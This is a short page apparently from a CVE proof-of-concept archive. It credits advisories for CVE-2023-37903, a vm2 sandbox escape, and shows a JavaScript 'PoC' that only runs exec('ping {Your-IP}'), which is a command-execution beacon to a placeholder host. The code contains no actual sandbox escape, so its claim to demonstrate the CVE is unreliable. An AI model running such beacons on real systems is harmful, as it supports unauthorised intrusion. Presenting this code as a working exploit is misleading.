4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / PoC.js JS
/* Credit Links: 

- https://nvd.nist.gov/vuln/detail/CVE-2023-37903
- https://github.com/patriksimek/vm2/security/advisories/GHSA-g644-9gfx-q4q4
- https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd

*/

/* Proof of Concept ↓↓ */

const { exec } = require('node:child_process')

exec('ping {Your-IP}', (err, result) => {
   if (err){
      console.error("Failed:", err)
      return
    }

console.log(result);})